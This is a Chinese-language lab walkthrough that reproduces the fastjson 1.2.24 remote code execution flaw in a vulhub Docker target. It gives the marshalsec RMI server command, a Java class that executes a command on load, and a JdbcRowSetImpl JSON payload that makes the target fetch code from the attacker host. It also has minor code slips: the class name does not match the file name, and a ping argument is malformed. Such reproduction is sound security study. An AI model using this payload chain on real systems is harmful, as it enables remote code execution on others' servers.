原理
fastjson由于没有对@type进行安全性验证,使攻击者传入危险的类,通过rmi服务指定的攻击机上的恶意class文件,导致命令执行。
版本
1.2.24
环境准备
靶机:ubuntu,192.168.52.129
攻击机:kali,192.168.52.128
复现步骤:
1、靶机下载启动漏洞环境
git clone https://github.com/vulhub/vulhub.git
cd vulhub/fastjson/1.2.24-rce 进入vulhub目录
docker-compose up -d 启动漏洞环境
此时能够访问192.168.52.129:8090
2、攻击机利用python快速开启http服务
python -m http.server 80
3、攻击机编译并开启RMI服务
下载marshalsec:
git clone https://github.com/mbechler/marshalsec.git
安装maven:
apt-get install maven
使用maven编译marshalsec成jar包,先进入下载的marshalsec文件中:
mvn clean package -DskipTests
启动一个RMI服务器,设置监听端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.52.128/#lzy" 9999
注意文件名前的#
4、制作恶意class文件
import java.lang.Runtime;
import java.lang.Process;
public class test {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"ping", "-c", "pdbe23.dnslog.cn"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
编译成class
javac lzy.java
此时生成了lzy.class文件
5、bp抓包
把GET修改成POST,添加POC
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.52.128:9999/lzy",
"autoCommit":true
}
}
查看dnslog,复现成功